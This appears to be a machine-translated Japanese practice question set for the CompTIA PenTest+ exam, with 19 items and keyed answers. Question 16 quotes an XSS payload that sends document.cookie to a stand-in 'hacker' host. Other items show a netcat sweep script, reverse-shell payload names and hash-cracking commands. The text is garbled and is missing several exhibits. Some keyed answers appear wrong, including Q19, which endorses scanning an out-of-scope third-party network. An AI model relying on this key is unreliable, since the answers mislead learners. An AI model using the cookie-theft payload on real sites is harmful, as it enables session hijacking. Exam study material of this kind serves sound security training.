PT0-002日本語無料問題集「CompTIA PenTest+ Certification (PT0-002日本語版)」

質問 1

侵入テストの報告活動中に得られた発見事項について、要約した概要レベルの議論を示すものはどれですか。

（A）概要

（B）作業内容の説明

（C）技術レポート

（D）テスト範囲

正解：A 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 2

侵入テスターは、アクティブなシステムを迅速に識別するためにクラス C ネットワークを調査しています。侵入テスターは次のコマンドのどれを使用する必要がありますか?

（A）nmap は 192.168.0.1-254 に接続します

（B）nmap は 192.168.0.1 192.168.0.1.254 に接続します

（C）nmap は 192.168.0.1/16 に接続します

（D）nmap גsN 192.168.0.0/24

正解：A 解答を投票する

質問 3

侵入テスト担当者が侵入テストを実施していたところ、ネットワークトラフィックがクライアントの IP アドレスに到達していないことがわかりました。テスターは後に、SOC がペネトレーションテスターの IP アドレスでシンクホールを使用していたことを発見しました。次のうち、何が起こったのかを最もよく表しているのはどれですか?

（A）ペネトレーションテスターの連絡先が間違っていた

（B）計画プロセスで、すべてのチームに確実に通知することができませんでした

（C）侵入テスターが間違ったアセットをテストしていた

（D）クライアントは評価を開始する準備ができていませんでした

正解：B 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 4

次のツールのうち、侵入テスターがワイヤレスハンドシェイクをキャプチャして Windows マシンから Wi-Fi パスワードを明らかにするのに最も適しているのはどれですか?

（A）エアクラッキング

（B）EAPハンマー

（C）ワイヤーシャーク

（D）キスメット

正解：A 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 5

ペネトレーションテスターは、侵害されたシステム上で次のスクリプトを作成しました。
#!/bin/bash
network='10.100.100'
ports='22 23 80 443'
for x in {1 .. 254};
do (nc -zv $network.$x $ports );
終わり
別のツールの代わりにこのスクリプトを使用することについて説明できるのは次のうちどれですか?

（A）Bash スクリプトは、より完全な出力を提供します。

（B）ペネトレーションテスターは、このスクリプトを永続化して再起動時に実行したいと考えていました。

（C）この構成では、ペネトレーションテスターが追加のファイルを使用しないようにする必要がありました。

（D）一般的なツールは Windows システムに対して使用できませんでした。

正解：C 解答を投票する

質問 6

評価者は、できるだけ静かに Nmap スキャンを実行したいと考えています。次のコマンドのうち、検出の可能性が最も低いコマンドはどれですか?

（A）nmap - A 192.168.0.1

（B）nmap - T0 192.168.0.1

（C）nmap - "P0 192.168.0.1

（D）nmap -"T3 192.168.0.1

正解：B 解答を投票する

質問 7

クライアントの建物内の安全な部屋にアクセスするための物理的な侵入テストを実行するために、侵入テスターが雇われました。外部偵察により、2 つの入口、WiFi ゲストネットワーク、およびインターネットに接続された複数のセキュリティカメラが特定されました。
次のツールまたは手法のうち、追加の偵察をサポートするのに最も適しているのはどれですか?

（A）エアクラッキング

（B）偵察

（C）ウォードライビング

（D）初段

正解：B 解答を投票する

質問 8

あるソフトウェア会社は、会社のソフトウェア開発プラクティスのセキュリティを評価するために、セキュリティコンサルタントを雇いました。コンサルタントは、ソフトウェアバイナリでファジングを実行して偵察を開始することを選択します。次の脆弱性のうち、セキュリティコンサルタントが特定する可能性が最も高いのはどれですか?

（A）バッファオーバーフロー

（B）弱い認証スキーム

（C）文字列に格納された認証情報

（D）最適化されていないリソース管理

正解：A 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 9

侵入テスターは、MD5 ハッシュをより迅速に解読したいと考えています。テスターは、パスワードの最初の部分が Winter で、その後に 4 桁の数字と最後に特殊文字が続くことを知っています。テスターは次のコマンドのどれを使用すればよいでしょうか。

（A）John hash.txt --format-MD5 -wordlist-seasons.txt --fork-8 --rules-base64

（B）hashcat hash.txt -m 0 -a € seasons.txt ?d?d?d?d?s

（C）John hash.txt -format=Raw-MD5 -rules=jumbo -wordlist=seasons.txt

（D）hashcat hahs.txt -m 500 -a 7 -force -) -w 4 -opencl-device-types 1,2

正解：D 解答を投票する

質問 10

侵入テスターは、エンゲージメントで使用するために次のスクリプトを作成しました。
ただし、スクリプトを実行しようとすると、テスターは次のエラーを受け取ります。
エラーの原因は次のどれですか?

（A）sys変数が定義されていません。

（B）argv 変数が定義されていません。

（C）sys モジュールがインポートされませんでした。

（D）argv モジュールがインポートされませんでした。

正解：C 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 11

インターネットに直接接続されている LOT デバイスに関連する最も一般的な脆弱性は次のうちどれですか?

（A）ネットワークに接続できない

（B）DDoS 攻撃に対する脆弱性

（C）デフォルトのパスワードの存在

（D）サポートされていないオペレーティングシステム

正解：C 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 12

侵入テスターがサーバーの脆弱性を悪用し、ペイロードをリモートで実行してシェルを取得しました。ただし、接続は確立されず、ペイロードの実行でエラーは表示されませんでした。侵入テスターは、IPS や次世代ファイアウォールなどのネットワークデバイスが接続を切断しているのではないかと疑っていました。次のペイロードのうち、シェルを正常に確立する可能性が最も高いのはどれですか?

（A）windows/x64/meterpreter/reverse_https

（B）windows/x64/meterpreter/reverse_tcp

（C）windows/x64/shell_reverse_tcp

（D）windows/x64/powershell_reverse_tcp

（E）windows/x64/meterpreter/reverse_http

正解：E 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 13

侵入テスト中に CentOS コンピューターが悪用されました。最初の偵察中に、侵入テスターはポート 25 が内部の Sendmail サーバーで開いていることを発見しました。ステルス性を保つために、テスターは攻撃マシンから次のコマンドを実行しました。

次のうち、標的のネットワークにさらに侵入するために使用するのに最適なコマンドはどれですか?

（A）nc 10.10.1.2

（B）nc 127.0.0.1 5555

（C）ssh 127.0.0.1 5555

（D）ssh 10.10.1.2

正解：B 解答を投票する

質問 14

いつ
URL http://192.168.0-1/validate/user.php にアクセスすると、ペネトレーションテスターは次の出力を取得しました。
..d index: eid in /apache/www/validate/user.php line 12
..d index: uid in /apache/www/validate/user.php line 13
..d index: pw in /apache/www/validate/user.php line 14
..d index: acl in /apache/www/validate/user.php line 15

（A）安全でないデータ送信

（B）コマンド構文が正しくありません

（C）エラー処理が不十分

（D）コード署名の欠如

正解：C 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 15

次の表があるとします。

Python スクリプトでファイアウォールルールの既知の適切な構成を保存するために最もよく使用されるデータ構造は次のどれですか。

（A）リスト

（B）辞書

（C）木

（D）タプル

正解：B 解答を投票する

質問 16

次のコードがあるとします。
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
この種の攻撃を防ぐための最良の方法は次のうちどれですか? （2つ選んでください。）

（A）入力の検証

（B）Web アプリケーションファイアウォール

（C）セッショントークン

（D）Base64 エンコーディング

（E）出力エンコーディング

（F）パラメータ化されたクエリ

正解：A、E 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 17

侵入テスト中にクライアントの連絡窓口と通信する潜在的な理由は、テストコンポーネントがシステムまたはサービスをクラッシュさせ、正規のユーザーとさらなるテストの両方が利用できなくなった場合に解決策を提供することです。この概念を最もよく説明しているのは次のうちどれですか?

（A）再テスト中

（B）衝突検出

（C）修復

（D）エスカレーション解除

正解：C 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 18

組織のオフィスの物理的なセキュリティ評価を実行するために、侵入テスターが雇われました。数時間環境を監視した後、ペネトレーションテスターは、一部の従業員が近くのレストランで昼食を取り、食べ物を手に入れている間、持ち物をテーブルに放置していることに気付きました。次の手法のうち、多くのアラートを発生させずに組織の建物への正当なアクセスを取得するために使用される可能性が最も高いのはどれですか?

（A）共連れ

（B）ゴミ箱ダイビング

（C）ショルダーサーフィン

（D）バッジの複製

正解：D 解答を投票する

質問 19

侵入テスターが、以前は不明だったインターフェイス上の IP 範囲を持つネットワークデバイスへのアクセスを取得しました。さらなる調査により、これはサードパーティサプライヤーへの常時接続 VPN トンネルであることが判明しました。
ペネトレーションテスターが取るべき最善のアクションは次のうちどれですか?

（A）IP 範囲をスキャンして、悪用する追加のシステムを探します。

（B）他の内部デバイスへのピボット手段としてトンネルを利用します。

（C）IP 範囲は範囲外なので無視します。

（D）評価を中止し、緊急連絡先に連絡します。

正解：A 解答を投票する

PT0-002日本語無料問題集「CompTIA PenTest+ Certification (PT0-002日本語版)」

弊社を連絡する

関連リンク

トップ試験

PT0-002日本語 無料問題集「CompTIA PenTest+ Certification (PT0-002日本語版)」

弊社を連絡する

関連リンク

トップ試験

PT0-002日本語無料問題集「CompTIA PenTest+ Certification (PT0-002日本語版)」